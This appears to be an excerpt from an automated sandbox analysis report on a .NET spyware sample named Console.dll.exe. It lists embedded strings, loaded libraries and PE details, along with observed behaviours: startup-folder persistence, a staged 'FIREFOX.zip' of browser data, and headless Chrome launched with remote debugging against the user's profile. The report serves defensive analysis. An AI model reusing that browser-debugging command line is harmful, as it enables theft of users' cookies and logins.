            Source: Console.dll.exeString found in binary or memory: https://github.com/dotnet/runtimeN
            Source: SQLitePCLRaw.core.dll.0.drString found in binary or memory: https://github.com/ericsink/SQLitePCL.raw
            Source: SQLitePCLRaw.core.dll.0.drString found in binary or memory: https://github.com/ericsink/SQLitePCL.rawX
            Source: Console.dll.exe, Microsoft.CSharp.dll.0.drString found in binary or memory: https://github.com/mono/linker/issues/1416.
            Source: Console.dll.exeString found in binary or memory: https://github.com/mono/linker/issues/1731
            Source: Console.dll.exe, 00000000.00000002.1642766032.000000006C7B1000.00000020.00000001.01000000.00000016.sdmp, Console.dll.exe, 00000007.00000002.2010033450.000000006C851000.00000020.00000001.01000000.00000016.sdmpString found in binary or memory: https://github.com/mono/linker/issues/1895v
            Source: Console.dll.exe, Microsoft.CSharp.dll.0.drString found in binary or memory: https://github.com/mono/linker/issues/1906.
            Source: Console.dll.exeString found in binary or memory: https://github.com/mono/linker/issues/378
            Source: Console.dll.exe, 00000000.00000002.1643170420.000000006C861000.00000020.00000001.01000000.00000015.sdmp, Console.dll.exe, 00000007.00000002.2010341131.000000006C901000.00000020.00000001.01000000.00000015.sdmpString found in binary or memory: https://github.com/mono/linker/pull/2125.
            Source: Console.dll.exe, 00000000.00000002.1645448627.000000006CC41000.00000020.00000001.01000000.00000005.sdmp, Console.dll.exe, 00000007.00000002.2010963718.000000006CC41000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: https://github.com/mono/linker/pull/649
            Source: chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2554033678.00001794002A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/161903006
            Source: chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2554033678.00001794002A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/166809097
            Source: chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2554033678.00001794002A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/184850002
            Source: chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2554033678.00001794002A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/187425444
            Source: chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2554033678.00001794002A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/220069903
            Source: chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2554033678.00001794002A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/229267970
            Source: chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2554033678.00001794002A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/250706693
            Source: chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2554033678.00001794002A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/253522366
            Source: chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2554033678.00001794002A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/255411748
            Source: chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2554033678.00001794002A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/258207403
            Source: chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2554033678.00001794002A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/274859104
            Source: chrome.exe, 00000008.00000002.2554033678.00001794002A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/284462263
            Source: chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552197489.0000179400040000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/issues/166475273
            Source: Console.dll.exe, 00000000.00000003.1608935848.000000000CE5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://system.data.sqlite.org/
            Source: Console.dll.exe, 00000007.00000002.2003760302.00000000093B2000.00000002.00000001.01000000.00000013.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
            Source: Console.dll.exe, 00000000.00000002.1631322072.0000000009B22000.00000002.00000001.01000000.00000013.sdmp, Console.dll.exe, 00000007.00000002.2003760302.00000000093B2000.00000002.00000001.01000000.00000013.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
            Source: Console.dll.exe, 00000000.00000003.1608935848.000000000CE5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sqlite.org/copyright.html2
            Source: chrome.exe, 00000008.00000002.2551193176.0000023E8559B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.vign.com/CPS04
            Source: C:\Users\user\Desktop\Console.dll.exe Code function: String function: 010DC750 appears 55 times
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe Code function: String function: 005AC750 appears 55 times
            Source: Console.dll.exe Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
            Source: System.Runtime.Serialization.Formatters.dll.0.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: System.Runtime.Serialization.Primitives.dll.0.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: System.Collections.Immutable.dll.0.dr Static PE information: No import functions for PE file found
            Source: System.Security.AccessControl.dll.0.dr Static PE information: No import functions for PE file found
            Source: System.Runtime.Serialization.Formatters.dll.0.dr Static PE information: No import functions for PE file found
            Source: System.Runtime.Numerics.dll.0.dr Static PE information: No import functions for PE file found
            Source: System.Collections.NonGeneric.dll.0.dr Static PE information: No import functions for PE file found
            Source: System.Collections.Specialized.dll.0.dr Static PE information: No import functions for PE file found
            Source: System.ComponentModel.Annotations.dll.0.dr Static PE information: No import functions for PE file found
            Source: System.Runtime.Serialization.Primitives.dll.0.dr Static PE information: No import functions for PE file found
            Source: System.Collections.dll.0.dr Static PE information: No import functions for PE file found
            Source: Console.dll.exe, 00000007.00000002.2012314955.000000006F8D1000.00000020.00000001.01000000.0000000F.sdmpBinary or memory string: OriginalFilenameSystem.Threading.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2010033450.000000006C851000.00000020.00000001.01000000.00000016.sdmpBinary or memory string: OriginalFilenameSystem.ComponentModel.TypeConverter.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2012771691.000000006FA21000.00000020.00000001.01000000.0000000A.sdmpBinary or memory string: OriginalFilenameSystem.Diagnostics.Process.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2002330319.0000000009174000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.Primitives.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2009638328.000000006C6D1000.00000020.00000001.01000000.00000018.sdmpBinary or memory string: OriginalFilenameSystem.Net.Http.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2013010421.000000006FA71000.00000020.00000001.01000000.00000009.sdmpBinary or memory string: OriginalFilenameSystem.Console.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2006604253.000000000BD14000.00000002.00000001.01000000.00000026.sdmpBinary or memory string: OriginalFilenameSystem.Threading.Overlapped.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2002875907.0000000009212000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: OriginalFilenamenetstandard.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2012640726.000000006FA01000.00000020.00000001.01000000.0000000C.sdmpBinary or memory string: OriginalFilenameSystem.Runtime.InteropServices.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2008613151.000000006C1C1000.00000020.00000001.01000000.00000022.sdmpBinary or memory string: OriginalFilenameSystem.Collections.Concurrent.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2001237728.0000000008C42000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: OriginalFilenameSystem.Runtime.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2002237108.0000000008E08000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilenameConsole.dll0 vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2006839086.000000000BD44000.00000002.00000001.01000000.00000028.sdmpBinary or memory string: OriginalFilenameSystem.Threading.ThreadPool.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2006989969.000000000BF14000.00000002.00000001.01000000.00000029.sdmpBinary or memory string: OriginalFilenameSystem.Runtime.Intrinsics.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000000.1732782276.0000000000B21000.00000002.00000001.01000000.0000002D.sdmpBinary or memory string: OriginalFilenamemscordaccore.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000000.1732782276.0000000000B21000.00000002.00000001.01000000.0000002D.sdmpBinary or memory string: OriginalFilenameConsole.dll0 vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2008903871.000000006C241000.00000020.00000001.01000000.0000001E.sdmpBinary or memory string: OriginalFilenameSystem.Security.Cryptography.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2010963718.000000006CC41000.00000020.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenameSystem.Private.CoreLib.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2011990883.000000006ED91000.00000020.00000001.01000000.0000002B.sdmpBinary or memory string: OriginalFilenameSystem.IO.Compression.ZipFile.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2008280739.000000006C121000.00000020.00000001.01000000.00000027.sdmpBinary or memory string: OriginalFilenameSystem.Net.NameResolution.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2012440781.000000006F9D1000.00000020.00000001.01000000.0000000D.sdmpBinary or memory string: OriginalFilenameSystem.Memory.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2008763140.000000006C201000.00000020.00000001.01000000.0000001F.sdmpBinary or memory string: OriginalFilenameSystem.Private.Uri.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2008453543.000000006C141000.00000020.00000001.01000000.00000025.sdmpBinary or memory string: OriginalFilenameSystem.Net.Sockets.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2009427893.000000006C4A1000.00000020.00000001.01000000.0000001C.sdmpBinary or memory string: OriginalFilenameSystem.Diagnostics.DiagnosticSource.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2010341131.000000006C901000.00000020.00000001.01000000.00000015.sdmpBinary or memory string: OriginalFilenameSystem.Linq.Expressions.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2002817527.000000000920A000.00000002.00000001.01000000.00000011.sdmpBinary or memory string: OriginalFilenamewebsocket-sharp.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2009258899.000000006C401000.00000020.00000001.01000000.0000001D.sdmpBinary or memory string: OriginalFilenameSystem.Net.Security.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2013487031.0000000070161000.00000020.00000001.01000000.0000002C.sdmpBinary or memory string: OriginalFilenameSystem.Collections.NonGeneric.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2008096157.000000006C051000.00000020.00000001.01000000.0000002A.sdmpBinary or memory string: OriginalFilenameSystem.IO.Compression.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2002523113.0000000009194000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: OriginalFilenameSystem.Text.Encoding.Extensions.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2003847073.000000000945E000.00000002.00000001.01000000.00000013.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2013312223.000000006FAA1000.00000020.00000001.01000000.00000008.sdmpBinary or memory string: OriginalFilenameSystem.Collections.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2012133277.000000006EDC1000.00000020.00000001.01000000.00000019.sdmpBinary or memory string: OriginalFilenameSystem.Net.Primitives.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2003175847.0000000009254000.00000002.00000001.01000000.00000014.sdmpBinary or memory string: OriginalFilenameSystem.Threading.Thread.dll@ vs Console.dll.exe
            Source: Console.dll.exeBinary or memory string: OriginalFilenamemscordaccore.dll@ vs Console.dll.exe
            Source: Console.dll.exeBinary or memory string: OriginalFilenameConsole.dll0 vs Console.dll.exe
            Source: Console.dll.exeBinary or memory string: OriginalFilenameMicrosoft.CSharp.dll@ vs Console.dll.exe
            Source: Console.dll.exeBinary or memory string: OriginalFilenameMicrosoft.VisualBasic.Core.dll@ vs Console.dll.exe
            Source: Console.dll.exeBinary or memory string: OriginalFilenameMicrosoft.VisualBasic.dll@ vs Console.dll.exe
            Source: Console.dll.exeBinary or memory string: OriginalFilenameMicrosoft.Win32.Primitives.dll@ vs Console.dll.exe
            Source: Console.dll.exeBinary or memory string: OriginalFilenameMicrosoft.Win32.Registry.dll@ vs Console.dll.exe
            Source: Console.dll.exeBinary or memory string: OriginalFilenameSystem.AppContext.dll@ vs Console.dll.exe
            Source: Console.dll.exeBinary or memory string: OriginalFilenameSystem.Buffers.dll@ vs Console.dll.exe
            Source: Console.dll.exeBinary or memory string: OriginalFilenameSystem.Collections.Concurrent.dll@ vs Console.dll.exe
            Source: Console.dll.exe.0.drBinary or memory string: OriginalFilenamemscordaccore.dll@ vs Console.dll.exe
            Source: Console.dll.exe.0.drBinary or memory string: OriginalFilenameConsole.dll0 vs Console.dll.exe
            Source: Console.dll.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: classification engine | Classification label: mal76.troj.adwa.spyw.evad.winEXE@14/195@0/2
            Source: C:\Users\user\Desktop\Console.dll.exe | Code function: 0_2_0121C0D0 FormatMessageW,GetLastError,WideCharToMultiByte,GetLastError,WideCharToMultiByte,WideCharToMultiByte,MultiByteToWideChar,MultiByteToWideChar,wcscpy_s,HeapFree,HeapFree,0_2_0121C0D0
            Source: C:\Users\user\Desktop\Console.dll.exe | File created: C:\Users\user\Documents\887849 - FIREFOX.zip
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe | Mutant created: NULL
            Source: C:\Users\user\Desktop\Console.dll.exe | File created: C:\Users\user~1\AppData\Local\Temp\.net
            Source: Console.dll.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
            Source: C:\Users\user\Desktop\Console.dll.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: Console.dll.exe, 00000000.00000003.1608935848.000000000CE5D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
            Source: Console.dll.exe, 00000000.00000003.1608935848.000000000CE5D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
            Source: Console.dll.exe, 00000000.00000003.1608935848.000000000CE5D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
            Source: Console.dll.exe, 00000000.00000003.1608935848.000000000CE5D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
            Source: Console.dll.exe, 00000000.00000003.1608935848.000000000CE5D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
            Source: Console.dll.exe, 00000000.00000003.1608935848.000000000CE5D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
            Source: Console.dll.exe, 00000000.00000003.1608935848.000000000CE5D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
            Source: Console.dll.exe, 00000000.00000003.1608935848.000000000CE5D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE y(name PRIMARY KEY,mode,mtime,sz,rawdata,data,method,z HIDDEN) WITHOUT ROWID;
            Source: Console.dll.exeString found in binary or memory: overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script>
            Source: Console.dll.exeString found in binary or memory: Morph - Structs/AddrExp
            Source: Console.dll.exeString found in binary or memory: NYI: patchpoint info generationD:\a\_work\1\s\src\coreclr\jit\compiler.cpptail.call and not BBINSTRprejitPre-importloopIndirect call transformImportationPost-importExpand patchpointsProfile instrumentationProfile instrumentation prepMorph - InitProfile incorporationMorph - Add internal blocksMorph - InliningRemove empty tryAllocate ObjectsMerge callfinally chainsRemove empty finallyUpdate finally target flagsClone finallyMorph - Structs/AddrExpUpdate flow graph early passPhysical promotionEarly livenessIdentify candidates for implicit byref copy omissionForward SubstitutionMorph - Promote StructsMorph - ByRefsMorph - FinishMorph - GlobalCompute edge weights (1, false)GS CookieMerge throw blocksTail mergePost-morph tail mergeInvert loopsOptimize layoutOptimize control flowSet block weightsCompute blocks reachabilityFind loopsRedundant zero InitsUnroll loopsClone loopsMorph array opsClear loop infoMark local varsHoist loop codeFind oper orderOptimize boolsBuild SSA representationSet block orderSSA: Doms1SSA: topological sortSSA: DFSSA: livenessSSA: renameSSA: insert phisDo value numberingEarly Value PropagationOptimize Valnum CSEsOptimize index checksVN based intrinsic expansionVN based copy propAssertion propRedundant branch optsVN-based dead store removalIf conversionCompute edge weights (2, false)Update flow graph opt passExpand runtime lookupsStress gtSplitTreeExpand TLS accessExpand static initDetermine first cold blockInsert GC PollsDo 'simple' loweringRationalize IRLocal var liveness initLocal var livenessGlobal local var livenessPer block local var livenessLowering nodeinfoLowering decompositionLinear scan register allocCalculate stack level slotsLSRA allocateLSRA build intervalsPlace 'align' instructionsLSRA resolveEmit codeGenerate codePost-EmitEmit GC+EH tablesProcessor does not have a high-frequency timer.
            Source: Console.dll.exeString found in binary or memory: GC initialization failed with error 0x%08XVirtualAlloc2kernelbase.dllMapViewOfFile3bad array new lengthstring too longUsing internal fxrApplication root path is empty. This shouldn't happenUsing internal hostpolicy<path>--additionalprobingpath--depsfilePath containing probing policy and assemblies to probe for.--runtimeconfigPath to <application>.deps.json file.--fx-versionPath to <application>.runtimeconfig.json file.Version of the installed Shared Framework to use to run the application.<version><value>--roll-forward--additional-depsRoll forward to framework version (LatestPatch, Minor, LatestMinor, Major, LatestMajor, Disable)--roll-forward-on-no-candidate-fxPath to additional deps.json file.<obsolete><n>Parsed known arg %s = %ssdk %s %-*s %sFailed to parse supported options or their values:Application '%s' is not a managed executable.Using the provided arguments to determine the application to execute.dotnet exec needs a managed .dll or .exe extension. The application specified was '%s'Application '%s' does not exist.--- Executing in split/FX mode...The application to execute does not exist: '%s'--- Executing in muxer mode...--- Executing in a native executable mode...staticexec RID: %s
            Source: Console.dll.exeString found in binary or memory: https://aka.ms/dotnet/download The path to an application .dll file to execute.path-to-application: --list-runtimes Display the installed runtimeshost-options:Common Options: --list-sdks Display the installed SDKs --info Display .NET information. -h|--help Displays this help.invalid string positionvector too longinvalid hash bucket countunordered_map/set too long--- Invoked %s [version: %s]Invalid startup info: host_path, dotnet_root, and app_path should not be null.hostfxr_main_startupinfohostfxr_main_bundle_startupinfoA fatal error occurred while processing application bundleget-native-search-directoriesHosting components are already initialized. Re-initialization to execute an app is not allowed.Runtime config is cfg=%s dev=%s|arch|\|tfm|.json.dev.jsonIgnoring additional probing path %s as it does not exist.The specified runtimeconfig.json [%s] does not exist|arch|/|tfm|Ignoring host interpreted additional probing path %s as it does not exist.Invalid runtimeconfig.json [%s] [%s].deps.jsonApp runtimeconfig.json from [%s]Specified runtimeconfig.json from [%s]The specified deps.json [%s] does not existInvalid value for command line argument '%s'Detecting mode... CoreCLR present in dotnet root [%s] and checking if [%s] file present=[%d].runtimeconfig.jsonHOSTFXR_PATHframework-dependentIt's invalid to use both '%s' and '%s' command line options.DOTNET_ADDITIONAL_DEPSself-containedExecuting as a %s app as per config file [%s]Using dotnet root path [%s]-h--help--list-sdks--list-runtimes--infoThe command could not be loaded, possibly because:
            Source: Console.dll.exeString found in binary or memory: https://aka.ms/dotnet/app-launch-failed
            Source: Console.dll.exeString found in binary or memory: https://aka.ms/dotnet/app-launch-failedFramework: 'The framework 'You must install .NET Desktop Runtime to run this application.You must install or update .NET to run this application.Required:
            Source: C:\Users\user\Desktop\Console.dll.exe | File read: C:\Users\user\Desktop\Console.dll.exe
            Source: unknown | Process created: C:\Users\user\Desktop\Console.dll.exe "C:\Users\user\Desktop\Console.dll.exe"
            Source: C:\Users\user\Desktop\Console.dll.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless --user-data-dir="C:\Users\user\AppData\Local\google\chrome\User Data"
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1728 --field-trial-handle=1436,i,4566748188218501428,17155313862400760302,262144 --disable-features=PaintHolding /prefetch:8
            Source: unknown | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe"
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless --user-data-dir="C:\Users\user\AppData\Local\google\chrome\User Data"
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1788 --field-trial-handle=1528,i,11531674968129144497,11491206366923448469,262144 --disable-features=PaintHolding /prefetch:8
            Source: C:\Users\user\Desktop\Console.dll.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\Console.dll.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\Console.dll.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\Console.dll.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\Console.dll.exe | Section loaded: icu.dll
            Source: C:\Users\user\Desktop\Console.dll.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\Console.dll.exe | Section loaded: dnsapi.dll
            Source: C:\Users\user\Desktop\Console.dll.exe | Section loaded: dhcpcsvc6.dll
            Source: C:\Users\user\Desktop\Console.dll.exe | Section loaded: dhcpcsvc.dll
            Source: C:\Users\user\Desktop\Console.dll.exe | Section loaded: winnsi.dll
            Source: C:\Users\user\Desktop\Console.dll.exe | Section loaded: winhttp.dll
            Source: C:\Users\user\Desktop\Console.dll.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\Console.dll.exe | Section loaded: mswsock.dll
            Source: C:\Users\user\Desktop\Console.dll.exe | Section loaded: wshunix.dll
            Source: C:\Users\user\Desktop\Console.dll.exe | Section loaded: winrnr.dll
            Source: C:\Users\user\Desktop\Console.dll.exe | Section loaded: nlaapi.dll
            Source: C:\Users\user\Desktop\Console.dll.exe | Section loaded: wshbth.dll
            Source: C:\Users\user\Desktop\Console.dll.exe | Section loaded: devobj.dll
            Source: C:\Users\user\Desktop\Console.dll.exe | Section loaded: napinsp.dll
            Source: C:\Users\user\Desktop\Console.dll.exe | Section loaded: pnrpnsp.dll
            Source: C:\Users\user\Desktop\Console.dll.exe | Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\Console.dll.exe | Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\Console.dll.exe | Section loaded: ntmarta.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe | Section loaded: wldp.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe | Section loaded: icu.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe | Section loaded: dnsapi.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe | Section loaded: dhcpcsvc6.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe | Section loaded: dhcpcsvc.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe | Section loaded: winnsi.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe | Section loaded: winhttp.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe | Section loaded: mswsock.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe | Section loaded: wshunix.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe | Section loaded: winrnr.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe | Section loaded: nlaapi.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe | Section loaded: wshbth.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe | Section loaded: devobj.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe | Section loaded: pnrpnsp.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe | Section loaded: napinsp.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe | Section loaded: rasadhlp.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe | Section loaded: fwpuclnt.dll
            Source: Console.dll.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
            Source: Console.dll.exe | Static file information: File size 77426070 > 1048576
            Source: Console.dll.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x53ba00
            Source: Console.dll.exe | Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x138e00
            Source: Console.dll.exe | Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x157800
            Source: Console.dll.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: Console.dll.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: Console.dll.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
